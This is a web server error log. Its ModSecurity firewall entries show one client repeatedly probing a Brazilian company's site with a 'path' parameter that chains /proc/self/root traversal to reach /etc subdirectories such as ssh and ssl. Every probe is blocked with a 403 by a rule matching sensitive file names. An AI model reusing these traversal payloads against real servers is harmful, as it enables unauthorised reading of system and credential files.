https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:46:14.004455 2026] [:error] [pid 15061:tid 140411666392832] [client 74.7.241.46:54310] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6JqTCbgAP5jq5TehLrwAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:46:15.307362 2026] [:error] [pid 10651:tid 140411691570944] [client 74.7.241.46:54324] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6J7ysWC90G-1nBrBl1wAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:46:16.608984 2026] [:error] [pid 10831:tid 140411674785536] [client 74.7.241.46:54328] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6KI6lpbStxTqkSkuI9QAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:46:18.993554 2026] [:error] [pid 14895:tid 140411649607424] [client 74.7.241.46:54336] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6KlajLEzk2WiQ-10zcAAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:46:20.332873 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.241.46:39844] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6LLABkC4fWIHEf8EZIgAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:46:21.647135 2026] [:error] [pid 15568:tid 140411565680384] [client 74.7.241.46:39856] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6LaQpVkWug9HeOt9U4wAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:46:22.833099 2026] [:error] [pid 10831:tid 140411582465792] [client 74.7.241.46:39858] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6Lo6lpbStxTqkSkuI9wAAAlM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:46:24.162506 2026] [:error] [pid 14895:tid 140411741927168] [client 74.7.241.46:39874] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6MFajLEzk2WiQ-10zdgAAAoA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:46:25.431575 2026] [:error] [pid 15061:tid 140411716749056] [client 74.7.241.46:39880] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6MaTCbgAP5jq5TehLugAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:46:28.464916 2026] [:error] [pid 15061:tid 140411599251200] [client 74.7.241.46:39882] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6NKTCbgAP5jq5TehLwAAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:46:37.919228 2026] [:error] [pid 15061:tid 140411716749056] [client 74.7.241.46:33556] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6PaTCbgAP5jq5TehLzQAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:46:44.079142 2026] [:error] [pid 10651:tid 140411683178240] [client 74.7.241.46:41232] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6RLysWC90G-1nBrBl3QAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:46:46.879582 2026] [:error] [pid 15061:tid 140411624429312] [client 74.7.241.46:41240] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6RqTCbgAP5jq5TehL2QAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:46:48.215704 2026] [:error] [pid 29802:tid 140411632822016] [client 74.7.241.46:52960] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6SM_BxrYCr4hPDw8KswAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:46:49.527776 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.241.46:52972] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6SbABkC4fWIHEf8EZJwAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:46:54.162159 2026] [:error] [pid 29802:tid 140411658000128] [client 74.7.241.46:52976] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6Ts_BxrYCr4hPDw8KvAAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:47:04.147750 2026] [:error] [pid 14895:tid 140411708356352] [client 74.7.228.16:33146] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abh6V1ajLEzk2WiQ-10ziwAAAoQ"]
[Mon Mar 16 18:47:07.055277 2026] [:error] [pid 29802:tid 140411649607424] [client 74.7.241.46:52986] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6W8_BxrYCr4hPDw8K0AAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:47:23.531287 2026] [:error] [pid 14895:tid 140411557287680] [client 74.7.241.46:49446] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6a1ajLEzk2WiQ-10zoAAAApY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:47:25.931899 2026] [:error] [pid 21805:tid 140411574073088] [client 74.7.241.46:60436] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6bbABkC4fWIHEf8EZLgAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:47:28.323295 2026] [:error] [pid 15061:tid 140411624429312] [client 74.7.241.46:60450] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6cKTCbgAP5jq5TehMAAAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:47:29.641460 2026] [:error] [pid 29507:tid 140411691570944] [client 74.7.241.46:35732] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6cUr9dMAiw-8KANNpkAAAAQY"], referer: 